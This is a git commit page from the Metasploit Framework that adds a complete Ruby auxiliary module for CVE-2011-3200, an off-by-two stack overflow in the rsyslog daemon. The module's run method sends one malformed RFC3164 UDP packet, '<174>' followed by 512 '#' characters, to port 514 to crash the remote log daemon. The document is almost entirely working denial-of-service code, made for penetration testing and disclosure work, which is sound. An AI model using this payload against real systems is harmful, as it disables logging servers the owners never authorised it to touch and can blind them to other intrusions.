Add a module for the rsyslog DoS (not triggerable on many platforms)
git-svn-id: file:///home/svn/framework3/trunk@13681 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
5cd80b54f3
commit
e4f74b75f8
|
@ -0,0 +1,55 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'rsyslog Long Tag Off-By-Two DoS',
|
||||
'Description' => %q{
|
||||
This module triggers an off-by-two stack overflow in the
|
||||
rsyslog daemon. This flaw is unlikely to yield code execution
|
||||
but is effective at shutting down a remote log daemon. This bug
|
||||
was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.
|
||||
Compiler differences may prevent this bug from causing any
|
||||
noticable result on many systems (RHEL6 is affected).
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2011-3200'],
|
||||
[ 'URL', 'http://www.rsyslog.com/potential-dos-with-malformed-tag/' ],
|
||||
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=727644' ],
|
||||
],
|
||||
'DisclosureDate' => 'Sep 01 2011')
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(514)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
connect_udp
|
||||
pkt = "<174>" + ("#" * 512) + ":"
|
||||
print_status("Sending message containing a malformed RFC3164 tag to #{rhost}")
|
||||
udp_sock.put(pkt)
|
||||
disconnect_udp
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue